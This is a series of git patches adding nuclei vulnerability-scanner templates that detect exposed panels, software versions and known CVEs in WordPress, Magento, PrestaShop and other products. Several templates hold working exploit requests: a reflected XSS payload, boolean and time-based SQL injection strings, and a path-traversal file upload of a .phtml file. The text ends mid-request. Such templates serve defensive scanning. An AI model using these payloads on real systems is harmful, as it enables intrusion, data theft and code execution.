From a2f84c9302a2f7757ff13838ae7ac64a48139ce9 Mon Sep 17 00:00:00 2001 From: Paolo Serra Date: Thu, 1 Jan 1970 00:00:00 +0000 Subject: [PATCH 0001/1768] Added template for unigui-server-monitor-exposure --- unigui-server-monitor-exposure.yaml | 34 +++++++++++++++++++++++++++++ 1 file changed, 34 insertions(+) create mode 100644 unigui-server-monitor-exposure.yaml diff --git a/unigui-server-monitor-exposure.yaml b/unigui-server-monitor-exposure.yaml new file mode 100644 index 0000000000..bd43afad2f --- /dev/null +++ b/unigui-server-monitor-exposure.yaml @@ -0,0 +1,34 @@ +id: unigui-server-monitor-exposure + +info: + name: UniGUI Server Monitor Panel Exposure + author: serrapa + severity: medium + description: Detects exposed UniGUI Server Monitor Panels which could reveal sensitive server statistics, users sessions, licensing information and others data. + reference: + - https://www.unigui.com/doc/online_help/using-server-monitor-(server-c.htm + tags: exposure,unigui + +requests: + - method: GET + path: + - "{{BaseURL}}/server" + + matchers-condition: and + matchers: + - type: word + words: + - "uniGUI Standalone Server" + - "uniGUI License Information" + - "Server Statistics" + part: body + + - type: status + status: + - 200 + + - type: dsl + dsl: + - "contains(body, 'layout:\"fit\",title:\"uniGUI Standalone Server\"')" + - "contains(body, 'layout:\"absolute\",title:\"Server Statistics\"')" + From 075b22acb734e63b7e7631913c8a79b77f0b1980 Mon Sep 17 00:00:00 2001 From: Anonymous Date: Thu, 1 Jan 1970 00:00:00 +0000 Subject: [PATCH 0002/1768] Added template for wordpress-bricks-builder-theme-detect --- wordpress-bricks-builder-theme-detect.yaml | 31 ++++++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 wordpress-bricks-builder-theme-detect.yaml diff --git a/wordpress-bricks-builder-theme-detect.yaml b/wordpress-bricks-builder-theme-detect.yaml new file mode 100644 index 0000000000..ceba2ead00 --- /dev/null +++ b/wordpress-bricks-builder-theme-detect.yaml @@ -0,0 +1,31 @@ +id: wordpress-bricks-builder-theme-detect +info: + name: Detect WordPress Bricks Builder Theme Version <= 1.9.6 + author: yourname + severity: info + description: Checks for Bricks Builder Theme versions 1.9.6 and below. + reference: + - https://0day.today/exploit/description/39489 + tags: wordpress,bricksbuilder,detection + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/themes/bricks/readme.txt" + + matchers-condition: and + matchers: + - type: word + words: + - "Bricks Builder" + part: body + + - type: regex + regex: + - "Version\\s([0-1]\\.[0-8]\\.\\d+|1\\.9\\.[0-6])" + part: body + condition: or + + - type: status + status: + - 200 From bafb1f984e80329939259fc48972031f4852a0b0 Mon Sep 17 00:00:00 2001 From: Mohammad Reza Omrani Date: Thu, 1 Jan 1970 00:00:00 +0000 Subject: [PATCH 0003/1768] Added template for apache-answer-version-detection-regex --- apache-answer-version-detection-regex.yaml | 28 ++++++++++++++++++++++ 1 file changed, 28 insertions(+) create mode 100644 apache-answer-version-detection-regex.yaml diff --git a/apache-answer-version-detection-regex.yaml b/apache-answer-version-detection-regex.yaml new file mode 100644 index 0000000000..85eceaa7ea --- /dev/null +++ b/apache-answer-version-detection-regex.yaml @@ -0,0 +1,28 @@ +id: apache-answer-version-detection-regex + +info: + name: Apache Answer Version Detection with Regex + author: Mohammad Reza Omrani | @omranisecurity + severity: info + description: Extracts the version of Apache Answer from the API endpoint using regex. + +requests: + - method: GET + path: + - "{{BaseURL}}/answer/api/v1/siteinfo/" + headers: + User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 + Referer: "{{BaseURL}}/users/login" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + extractors: + - type: regex + part: body + name: version + regex: + - '"version":"([^"]+)"' From f8ec45356e47d11a6a77bc540de71dda4ae7f37a Mon Sep 17 00:00:00 2001 From: Paolo Serra Date: Thu, 1 Jan 1970 00:00:00 +0000 Subject: [PATCH 0004/1768] Added template for uni-gui-framework-detection --- uni-gui-framework-detection.yaml | 39 ++++++++++++++++++++++++++++++++ 1 file changed, 39 insertions(+) create mode 100644 uni-gui-framework-detection.yaml diff --git a/uni-gui-framework-detection.yaml b/uni-gui-framework-detection.yaml new file mode 100644 index 0000000000..af1c00c6e3 --- /dev/null +++ b/uni-gui-framework-detection.yaml @@ -0,0 +1,39 @@ +id: uni-gui-framework-detection + +info: + name: Detect UniGUI Framework and Version + author: serrapa + severity: info + description: Checks for the presence of UniGUI framework and extracts its version along with the Sencha Ext JS version. + +requests: + - method: GET + path: + - "{{BaseURL}}/" + + matchers-condition: and + matchers: + - type: word + words: + - "uni-xtheme-" + - "ext-all.js" + - "uniVars._extVer=" + condition: or + part: body + - type: regex + regex: + - 'uni-(\d+\.\d+\.\d+\.\d+)/' + - 'uniVars._extVer="(\d+\.\d+\.\d+)"' + part: body + extractors: + - type: regex + regex: + - 'uni-(\d+\.\d+\.\d+\.\d+)/' + part: body + name: uni_gui_version + - type: regex + regex: + - 'uniVars._extVer="(\d+\.\d+\.\d+)"' + part: body + name: ext_js_version + From ee96b856555ca800bbd3abdb540cca18fce22953 Mon Sep 17 00:00:00 2001 From: Mohammad Reza Omrani Date: Thu, 1 Jan 1970 00:00:00 +0000 Subject: [PATCH 0005/1768] Added template for CVE-2024-3822 --- CVE-2024-3822.yaml | 27 +++++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 CVE-2024-3822.yaml diff --git a/CVE-2024-3822.yaml b/CVE-2024-3822.yaml new file mode 100644 index 0000000000..16f028eca3 --- /dev/null +++ b/CVE-2024-3822.yaml @@ -0,0 +1,27 @@ +id: CVE-2024-3822 + +info: + name: Base64 Encoder/Decoder <= 0.9.2 - Reflected XSS + author: omranisecurity + severity: medium + description: | + - The Base64 Encoder/Decoder WordPress plugin through 0.9.2 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin. + reference: | + - https://wpscan.com/vulnerability/ff5411b1-9e04-4e72-a502-e431d774642a/ + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-3822/ + metadata: + fofa-query: "wp-content/plugins/base64-encoderdecoder/" + max-request: 3 + tags: cve,wordpress,plugin,xss + +http: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/base64-encoderdecoder/base64-decode.php?string=PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==" + + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains(body, "")' + condition: and \ No newline at end of file From af96901d3fae7d79a2a7c2fc7cf60d166d8e1c9c Mon Sep 17 00:00:00 2001 From: Shivam Kamboj Dattana Date: Thu, 1 Jan 1970 00:00:00 +0000 Subject: [PATCH 0006/1768] Added template for cowboy-detect --- cowboy-detect.yaml | 25 +++++++++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 cowboy-detect.yaml diff --git a/cowboy-detect.yaml b/cowboy-detect.yaml new file mode 100644 index 0000000000..53a56edff0 --- /dev/null +++ b/cowboy-detect.yaml @@ -0,0 +1,25 @@ +id: cowboy-detect + +info: + name: Cowboy - Detect + author: sechunt3r + severity: info + description: Cowboy was detected. + reference: + - https://github.com/ninenines/cowboy + metadata: + verified: true + shodan-query: "cowboy" + tags: tech,cowboy,detect + +requests: + - method: GET + path: + - "{{BaseURL}}/" + + matchers-condition: and + matchers: + - type: word + words: + - "Server: Cowboy" + part: hea \ No newline at end of file From 0bba4427956b954e06b0fbdc8e2a902b1ed0f26f Mon Sep 17 00:00:00 2001 From: Paul Werther Date: Thu, 1 Jan 1970 00:00:00 +0000 Subject: [PATCH 0007/1768] Added template for CVE-2024-1380 --- CVE-2024-1380.yaml | 36 ++++++++++++++++++++++++++++++++++++ 1 file changed, 36 insertions(+) create mode 100644 CVE-2024-1380.yaml diff --git a/CVE-2024-1380.yaml b/CVE-2024-1380.yaml new file mode 100644 index 0000000000..62848e8eb1 --- /dev/null +++ b/CVE-2024-1380.yaml @@ -0,0 +1,36 @@ +id: CVE-2024-1380 + +info: + name: Relevanssi - A Better Search <= 4.22.0 - Unauthenticated Query Log Export + author: FLX + severity: medium + description: | + The Relevanssi Search plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check in all versions up to, and including, 4.22.0. This makes it possible for unauthenticated attackers to export the query log data. + reference: + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-1380 + - https://www.wordfence.com/threat-intel/vulnerabilities/id/7b2a3b17-0551-4e02-8e6a-ae8d46da0ef8?source=cve + - https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3033880%40relevanssi&new=3033880%40relevanssi&sfp_email=&sfph_mail= + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cve-id: CVE-2024-1380 + epss-score: 0.00043 + epss-percentile: 0.0866 + tags: wordpress,relevanssi,cve,vulnerability,cve2024 + +http: + - method: POST + path: + - "{{BaseURL}}/wp-admin/admin-ajax.php" + + headers: + Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + + body: "action=&relevanssi_export=1" + + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains(header, "Content-Disposition: attachment;filename=relevanssi_log.csv")' + - 'contains(header, "Content-Type: application/download")' \ No newline at end of file From 3a207683305cc5d34ddd709061f050dffca8f490 Mon Sep 17 00:00:00 2001 From: geeknik <466878+geeknik@users.noreply.github.com> Date: Mon, 12 Jun 2023 00:40:38 +0000 Subject: [PATCH 0008/1768] Create CVE-2022-24627.yaml --- http/cves/2022/CVE-2022-24627.yaml | 25 +++++++++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 http/cves/2022/CVE-2022-24627.yaml diff --git a/http/cves/2022/CVE-2022-24627.yaml b/http/cves/2022/CVE-2022-24627.yaml new file mode 100644 index 0000000000..45123c34ae --- /dev/null +++ b/http/cves/2022/CVE-2022-24627.yaml @@ -0,0 +1,25 @@ +id: CVE-2022-24627 + +info: + name: AudioCodes Device Manager Express SQL Injection Vulnerability + author: geeknik + severity: critical + description: Detects unauthenticated SQL injection in AudioCodes Device Manager Express up to version 7.8.20002.47752. + reference: https://nvd.nist.gov/vuln/detail/CVE-2022-24627 + tags: cve,cve2022,sql-injection,audiocodes + +http: + - method: POST + path: + - "{{BaseURL}}/process_login.php" + body: "p=test' OR '1'='1" + headers: + Content-Type: "application/x-www-form-urlencoded" + + matchers: + - type: word + words: + - "SQL syntax" + - "mysql_fetch" + - "You have an error in your SQL syntax" + part: body From 7102d5297ff4349d833688999bf3a5a2df0c7aee Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Wed, 14 Jun 2023 21:58:05 +0530 Subject: [PATCH 0009/1768] Update CVE-2022-24627.yaml --- http/cves/2022/CVE-2022-24627.yaml | 26 ++++++++++++++++---------- 1 file changed, 16 insertions(+), 10 deletions(-) diff --git a/http/cves/2022/CVE-2022-24627.yaml b/http/cves/2022/CVE-2022-24627.yaml index 45123c34ae..71956dce37 100644 --- a/http/cves/2022/CVE-2022-24627.yaml +++ b/http/cves/2022/CVE-2022-24627.yaml @@ -1,25 +1,31 @@ id: CVE-2022-24627 info: - name: AudioCodes Device Manager Express SQL Injection Vulnerability + name: AudioCodes Device Manager Express - SQL Injection author: geeknik severity: critical description: Detects unauthenticated SQL injection in AudioCodes Device Manager Express up to version 7.8.20002.47752. - reference: https://nvd.nist.gov/vuln/detail/CVE-2022-24627 - tags: cve,cve2022,sql-injection,audiocodes + reference: + - https://seclists.org/fulldisclosure/2023/Feb/12 + - https://nvd.nist.gov/vuln/detail/CVE-2022-24627 + classification: + cve-id: CVE-2022-24627 + tags: cve,cve2022,sqli,audiocodes http: - - method: POST - path: - - "{{BaseURL}}/process_login.php" - body: "p=test' OR '1'='1" - headers: - Content-Type: "application/x-www-form-urlencoded" + - raw: + - | + POST /admin/AudioCodes_files/process_login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + username=admin&password=&domain=&p=%5C%27or+1%3D1%23 matchers: - type: word + part: body words: - "SQL syntax" - "mysql_fetch" - "You have an error in your SQL syntax" - part: body + condition: or From abd5551262a6a560a81c3bd336609be03aaadd24 Mon Sep 17 00:00:00 2001 From: pentesttools-com Date: Wed, 20 Sep 2023 14:47:50 +0300 Subject: [PATCH 0010/1768] fix: template for CVE-2022-1595 This template uses two request, even though the POC linked in the reference uses only one. One request is enough, helps avoiding FNs and makes the last request be the one the user should see as a POC for this vuln. --- http/cves/2022/CVE-2022-1595.yaml | 7 ------- 1 file changed, 7 deletions(-) diff --git a/http/cves/2022/CVE-2022-1595.yaml b/http/cves/2022/CVE-2022-1595.yaml index 1e6b7b30f2..974b2c452e 100644 --- a/http/cves/2022/CVE-2022-1595.yaml +++ b/http/cves/2022/CVE-2022-1595.yaml @@ -34,9 +34,6 @@ http: HEAD /wp-login.php HTTP/1.1 Host: {{Hostname}} Cookie: valid_login_slug=1 - - | - HEAD /wp-login.php HTTP/1.1 - Host: {{Hostname}} matchers-condition: and matchers: @@ -46,7 +43,3 @@ http: - "contains(header_1, 'wordpress_')" - "contains(header_1, 'Location')" condition: and - - - type: dsl - dsl: - - "status_code_2 != 302" From 8c79fc2403b80dec57b6330ecebaa2851f4a5969 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Wed, 31 Jan 2024 16:57:17 +0530 Subject: [PATCH 0011/1768] updated matcher & req type --- http/cves/2022/CVE-2022-24627.yaml | 53 +++++++++++++++++------------- 1 file changed, 30 insertions(+), 23 deletions(-) diff --git a/http/cves/2022/CVE-2022-24627.yaml b/http/cves/2022/CVE-2022-24627.yaml index 71956dce37..408a99bb04 100644 --- a/http/cves/2022/CVE-2022-24627.yaml +++ b/http/cves/2022/CVE-2022-24627.yaml @@ -1,31 +1,38 @@ -id: CVE-2022-24627 +id: CVE-2024-1061 info: - name: AudioCodes Device Manager Express - SQL Injection - author: geeknik - severity: critical - description: Detects unauthenticated SQL injection in AudioCodes Device Manager Express up to version 7.8.20002.47752. + name: WordPress HTML5 Video Player - SQL Injection + author: xxcdd + severity: high + description: | + WordPress HTML5 Video Player plugin is vulnerable to SQL injection. An unauthenticated attacker can exploit this vulnerability to perform SQL injection attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to perform SQL injection attacks, potentially leading to unauthorized access, data leakage, or further compromise of the WordPress site. + remediation: | + Vendor did not acknowledge vulnerability but the issue seems to have been fixed in version 2.5.25. reference: - - https://seclists.org/fulldisclosure/2023/Feb/12 - - https://nvd.nist.gov/vuln/detail/CVE-2022-24627 + - https://www.tenable.com/security/research/tra-2024-02 + - https://wordpress.org/plugins/html5-video-player + - https://nvd.nist.gov/view/vuln/detail?vulnId=CVE-2024-1061 classification: - cve-id: CVE-2022-24627 - tags: cve,cve2022,sqli,audiocodes + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N + cvss-score: 8.6 + cve-id: CVE-2024-1061 + cwe-id: CWE-89 + metadata: + verified: true + fofa-query: '"wordpress" && body="html5-video-player"' + tags: cve,cve2024,wp,wordpress,wp-plugin,sqli,html5-video-player http: - - raw: - - | - POST /admin/AudioCodes_files/process_login.php HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - username=admin&password=&domain=&p=%5C%27or+1%3D1%23 + - method: GET + path: + - "{{BaseURL}}/?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+-" matchers: - - type: word - part: body - words: - - "SQL syntax" - - "mysql_fetch" - - "You have an error in your SQL syntax" - condition: or + - type: dsl + dsl: + - 'duration>=6' + - 'contains(header, "application/json")' + - 'contains_all(body, "created_at", "user_id")' + condition: and From 182c41f3940aeb2a9e407d319584cbe54e207db0 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha Date: Wed, 31 Jan 2024 16:58:34 +0530 Subject: [PATCH 0012/1768] Revert "updated matcher & req type" This reverts commit 8c79fc2403b80dec57b6330ecebaa2851f4a5969. --- http/cves/2022/CVE-2022-24627.yaml | 53 +++++++++++++----------------- 1 file changed, 23 insertions(+), 30 deletions(-) diff --git a/http/cves/2022/CVE-2022-24627.yaml b/http/cves/2022/CVE-2022-24627.yaml index 408a99bb04..71956dce37 100644 --- a/http/cves/2022/CVE-2022-24627.yaml +++ b/http/cves/2022/CVE-2022-24627.yaml @@ -1,38 +1,31 @@ -id: CVE-2024-1061 +id: CVE-2022-24627 info: - name: WordPress HTML5 Video Player - SQL Injection - author: xxcdd - severity: high - description: | - WordPress HTML5 Video Player plugin is vulnerable to SQL injection. An unauthenticated attacker can exploit this vulnerability to perform SQL injection attacks. - impact: | - Successful exploitation of this vulnerability could allow an attacker to perform SQL injection attacks, potentially leading to unauthorized access, data leakage, or further compromise of the WordPress site. - remediation: | - Vendor did not acknowledge vulnerability but the issue seems to have been fixed in version 2.5.25. + name: AudioCodes Device Manager Express - SQL Injection + author: geeknik + severity: critical + description: Detects unauthenticated SQL injection in AudioCodes Device Manager Express up to version 7.8.20002.47752. reference: - - https://www.tenable.com/security/research/tra-2024-02 - - https://wordpress.org/plugins/html5-video-player - - https://nvd.nist.gov/view/vuln/detail?vulnId=CVE-2024-1061 + - https://seclists.org/fulldisclosure/2023/Feb/12 + - https://nvd.nist.gov/vuln/detail/CVE-2022-24627 classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N - cvss-score: 8.6 - cve-id: CVE-2024-1061 - cwe-id: CWE-89 - metadata: - verified: true - fofa-query: '"wordpress" && body="html5-video-player"' - tags: cve,cve2024,wp,wordpress,wp-plugin,sqli,html5-video-player + cve-id: CVE-2022-24627 + tags: cve,cve2022,sqli,audiocodes http: - - method: GET - path: - - "{{BaseURL}}/?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+-" + - raw: + - | + POST /admin/AudioCodes_files/process_login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + username=admin&password=&domain=&p=%5C%27or+1%3D1%23 matchers: - - type: dsl - dsl: - - 'duration>=6' - - 'contains(header, "application/json")' - - 'contains_all(body, "created_at", "user_id")' - condition: and + - type: word + part: body + words: + - "SQL syntax" + - "mysql_fetch" + - "You have an error in your SQL syntax" + condition: or From 457fe56c2f2021ea9b38a6851192146e7d690927 Mon Sep 17 00:00:00 2001 From: Michal Mikolas Date: Tue, 12 Mar 2024 17:13:27 +0100 Subject: [PATCH 0013/1768] htdeployment: Added '.htdeployment' cache file exposure template. --- http/exposures/files/htdeployment.yaml | 31 ++++++++++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 http/exposures/files/htdeployment.yaml diff --git a/http/exposures/files/htdeployment.yaml b/http/exposures/files/htdeployment.yaml new file mode 100644 index 0000000000..d95b7b7b06 --- /dev/null +++ b/http/exposures/files/htdeployment.yaml @@ -0,0 +1,31 @@ +id: htdeployment + +info: + name: .htdeployment - files tree cache file + author: Michal Mikolas (nanuqcz) + severity: medium + description: FTP Deployment cache file that contains whole files structure with paths to potentially sensitive files. + remediation: Block access to the file using `.htaccess` on the server. The best-practise is to block all the folders/files beginning with `.` except `.well-known` folder. + reference: + - https://github.com/dg/ftp-deployment/tree/master + - https://github.com/dg/ftp-deployment/blob/master/src/Deployment/Deployer.php#L206 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + metadata: + verified: true + vendor: dg + product: ftp-deployment + tags: files,exposure,php,deployment,cache + +http: + - method: GET + path: + - "{{BaseURL}}/.htdeployment" + - "{{BaseURL}}/.deployment" + + matchers-condition: and + matchers: + - type: status + status: + - 200 From 23a968d8199ac946c6f1835c0ab507bc20ca64e1 Mon Sep 17 00:00:00 2001 From: Michal Mikolas Date: Wed, 13 Mar 2024 09:44:22 +0100 Subject: [PATCH 0014/1768] htdeployment: Improved matchers, lowering false positive chance (by added negative ' Date: Sat, 16 Mar 2024 19:23:48 +0200 Subject: [PATCH 0015/1768] Fixes and 2023 CvEs --- http/cves/2015/CVE-2015-4455.yaml | 57 +++++++++++++++++++ http/cves/2019/CVE-2019-7139.yaml | 53 +++++++++++++++++ http/cves/2023/CVE-2023-27032.yaml | 36 ++++++++++++ http/cves/2023/CVE-2023-45375.yaml | 32 +++++++++++ http/cves/2023/CVE-2023-46347.yaml | 32 +++++++++++ ...tashop-cartabandonmentpro-file-upload.yaml | 53 +++++++++++++++++ .../vbulletin/vbulletin-search-sqli.yaml | 37 ++++++++++++ 7 files changed, 300 insertions(+) create mode 100644 http/cves/2015/CVE-2015-4455.yaml create mode 100644 http/cves/2019/CVE-2019-7139.yaml create mode 100644 http/cves/2023/CVE-2023-27032.yaml create mode 100644 http/cves/2023/CVE-2023-45375.yaml create mode 100644 http/cves/2023/CVE-2023-46347.yaml create mode 100644 http/vulnerabilities/prestashop/prestashop-cartabandonmentpro-file-upload.yaml create mode 100644 http/vulnerabilities/vbulletin/vbulletin-search-sqli.yaml diff --git a/http/cves/2015/CVE-2015-4455.yaml b/http/cves/2015/CVE-2015-4455.yaml new file mode 100644 index 0000000000..249258d551 --- /dev/null +++ b/http/cves/2015/CVE-2015-4455.yaml @@ -0,0 +1,57 @@ +id: CVE-2015-4455 +info: + name: CVE-2015-4455 + author: MaStErChO + severity: critical + description: | + Unrestricted file upload vulnerability in includes/upload.php in the Aviary Image Editor Add-on For Gravity Forms plugin 3.0 beta for WordPress allows remote attackers to execute arbitrary code by uploading a file with an executable extension, then accessing it via a direct request to the file in wp-content/uploads/gform_aviary. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2015-4455 + - http://packetstormsecurity.com/files/132256/WordPress-Aviary-Image-Editor-Add-On-For-Gravity-Forms-3.0-Beta-Shell-Upload.html + metadata: + framework: wordpress + +variables: + filename: '{{rand_base(7, "abc")}}' + +http: + - raw: + - | + GET /?gf_page=upload HTTP/1.1 + Host: {{Hostname}} + + - | + POST /?gf_page=upload HTTP/1.1 + Host: {{Hostname}} + Content-Type: multipart/form-data; boundary=a54906fe12c504cb01ca836d062f82fa + + --a54906fe12c504cb01ca836d062f82fa + Content-Disposition: form-data; name="field_id" + + 3 + --a54906fe12c504cb01ca836d062f82fa + Content-Disposition: form-data; name="form_id" + + 1 + --a54906fe12c504cb01ca836d062f82fa + Content-Disposition: form-data; name="gform_unique_id" + + ../../../ + --a54906fe12c504cb01ca836d062f82fa + Content-Disposition: form-data; name="name" + + {{filename}}.phtml + --a54906fe12c504cb01ca836d062f82fa + Content-Disposition: form-data; name="file"; filename="{{filename}}.jpg" + Content-Type: text/html + + {{randstr}} + --a54906fe12c504cb01ca836d062f82fa-- + + matchers: + - type: dsl + dsl: + - 'contains(body_1, "Failed to upload file")' + - 'status_code_2 == 200' + - 'contains(body_2, "uploaded_filename\":\"{{filename}}.jpg")' + condition: and \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-7139.yaml b/http/cves/2019/CVE-2019-7139.yaml new file mode 100644 index 0000000000..23f951d9cb --- /dev/null +++ b/http/cves/2019/CVE-2019-7139.yaml @@ -0,0 +1,53 @@ +id: CVE-2019-7139 +info: + name: CVE-2019-7139 + author: MaStErChO + severity: high + description: | + The Magento application running on the remote web server is affected by a SQL injection vulnerability due to failing to properly sanitize the user-supplied ‘from’ and ‘to’ inputs to the ‘prepareSqlCondition’ function of the ‘Magento\Framework\DB\Adapter\Pdo\Mysql’ class. An unauthenticated, remote attacker can exploit this to execute arbitrary SQL statements against the back-end database, leading to the execution of arbitrary code, manipulation of data, or disclosure of sensitive information + reference: + - https://pentest-tools.com/blog/exploiting-sql-injection-in-magento-with-sqlmap + - https://www.ambionics.io/blog/magento-sqli + metadata: + framework: magento + tags: sqli,magento + +http: + - raw: + - | + GET / HTTP/1.1 + Host: {{Hostname}} + - | + GET /catalog/product_frontend_action/synchronize?type_id=recently_products&ids[0][added_at]=&ids[0][product_id][from]=?&ids[0][product_id][to]=)))%20OR%20(SELECT%201%20UNION%20SELECT%202%20FROM%20DUAL%20WHERE%201=0)%20--%20- HTTP/1.1 + Host: {{Hostname}} + - | + GET /catalog/product_frontend_action/synchronize?type_id=recently_products&ids[0][added_at]=&ids[0][product_id][from]=?&ids[0][product_id][to]=)))%20OR%20(SELECT%201%20UNION%20SELECT%202%20FROM%20DUAL%20WHERE%201=1)%20--%20- HTTP/1.1 + Host: {{Hostname}} + - | + GET /catalog/product_frontend_action/synchronize?type_id=recently_products&ids[0][added_at]=&ids[0][product_id][from]=?&ids[0][product_id][to]=)))+OR+(SELECT*FROM+(SELECT+SLEEP((6)))a)%3d1+--+- HTTP/1.1 + Host: {{Hostname}} + + stop-at-first-match: true + + matchers-condition: or + matchers: + - type: dsl + name: Blind + dsl: + - 'contains(body_1, "text/x-magento-init")' + - 'status_code_2 == 200' + - 'status_code_3 == 400' + - 'contains(content_type_2, "application/json")' + - 'contains(content_type_3, "application/json")' + - 'len(body_2) == 2' + - 'len(body_3) == 2' + condition: and + + - type: dsl + name: Time + dsl: + - 'contains(body_1, "text/x-magento-init")' + - 'duration_4>=6' + - 'contains(content_type_4, "application/json")' + - 'len(body_4) == 2' + condition: and \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-27032.yaml b/http/cves/2023/CVE-2023-27032.yaml new file mode 100644 index 0000000000..c60a11e97f --- /dev/null +++ b/http/cves/2023/CVE-2023-27032.yaml @@ -0,0 +1,36 @@ +id: CVE-2023-27032 +info: + name: CVE-2023-27032 + author: MaStErChO + severity: critical + description: | + In the module “Advanced Popup Creator” (advancedpopupcreator) from Idnovate for PrestaShop, a guest can perform SQL injection in affected versions. + reference: + - https://security.friendsofpresta.org/modules/2023/04/11/advancedpopupcreator.html + metadata: + max-request: 1 + framework: prestashop + shodan-query: http.component:"prestashop" + tags: sqli,prestashop,advancedpopupcreator + +http: + - raw: + - | + POST /module/advancedpopupcreator/popup HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + availablePopups=if(now()=sysdate()%2Csleep(6)%2C0)&event=1&fromController=product&getPopup=1&id_category=0&id_manufacturer=0&id_product=1&id_supplier=0&referrer=&responsiveWidth=1280&time=1709941392995&token=1946dc43bb8d7cb5fef89588e87479d8 + + matchers-condition: and + matchers: + - type: dsl + dsl: + - 'duration>=6' + - type: status + status: + - 200 + - type: word + part: body + words: + - "popups" \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-45375.yaml b/http/cves/2023/CVE-2023-45375.yaml new file mode 100644 index 0000000000..5281105b5d --- /dev/null +++ b/http/cves/2023/CVE-2023-45375.yaml @@ -0,0 +1,32 @@ +id: CVE-2023-45375 +info: + name: CVE-2023-45375 + author: MaStErChO + severity: high + description: | + In the module “PireosPay” (pireospay) up to version 1.7.9 from 01generator.com for PrestaShop, a guest can perform SQL injection in affected versions. + reference: + - https://security.friendsofpresta.org/modules/2023/10/12/pireospay.html + metadata: + max-request: 1 + framework: prestashop + shodan-query: http.component:"prestashop" + tags: sqli,prestashop,pireospay + +http: + - raw: + - | + POST /module/pireospay/validation HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + ajax=true&MerchantReference=1%22;select(0x73656c65637420736c6565702836293b)INTO@a;prepare`b`from@a;execute`b`;-- + + matchers-condition: and + matchers: + - type: dsl + dsl: + - 'duration>=6' + - type: status + status: + - 302 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-46347.yaml b/http/cves/2023/CVE-2023-46347.yaml new file mode 100644 index 0000000000..e9306d239e --- /dev/null +++ b/http/cves/2023/CVE-2023-46347.yaml @@ -0,0 +1,32 @@ +id: CVE-2023-46347 +info: + name: CVE-2023-46347 + author: MaStErChO + severity: high + description: | + In the module “Step by Step products Pack” (ndk_steppingpack) up to 1.5.6 from NDK Design for PrestaShop, a guest can perform SQL injection in affected versions. + reference: + - https://security.friendsofpresta.org/modules/2023/10/24/ndk_steppingpack.html + - https://stack.chaitin.com/poc/detail/3977 + metadata: + max-request: 1 + framework: prestashop + shodan-query: http.component:"prestashop" + tags: sqli,prestashop,ndk_steppingpack + +http: + - raw: + - | + POST /modules/ndk_steppingpack/search-result.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + search_query=1%22%29;select+0x73656c65637420736c6565702836293b+into+@a;prepare+b+from+@a;execute+b;-- + matchers-condition: and + matchers: + - type: dsl + dsl: + - 'duration>=6' + - type: status + status: + - 200 \ No newline at end of file diff --git a/http/vulnerabilities/prestashop/prestashop-cartabandonmentpro-file-upload.yaml b/http/vulnerabilities/prestashop/prestashop-cartabandonmentpro-file-upload.yaml new file mode 100644 index 0000000000..c88c996e72 --- /dev/null +++ b/http/vulnerabilities/prestashop/prestashop-cartabandonmentpro-file-upload.yaml @@ -0,0 +1,53 @@ +id: prestashop-cartabandonmentpro-file-upload + +info: + name: Prestashop Cart Abandonment Pro File Upload + author: MaStErChO + severity: critical + reference: + - https://www.openservis.cz/prestashop-blog/nejcastejsi-utoky-v-roce-2023-seznam-deravych-modulu-nemate-nejaky-z-nich-na-e-shopu-i-vy/ + - https://dh42.com/blog/prestashop-security/ + metadata: + framework: prestashop + shodan-query: http.component:"prestashop" + tags: intrusive,file-upload,cartabandonmentpro,prestashop +variables: + filename: '{{rand_base(7, "abc")}}' + title: '{{rand_base(7, "abc")}}' + + +http: + - raw: + - | + POST /modules/{{paths}}/upload.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: multipart/form-data; boundary=xYzZY + + --xYzZY + Content-Disposition: form-data; 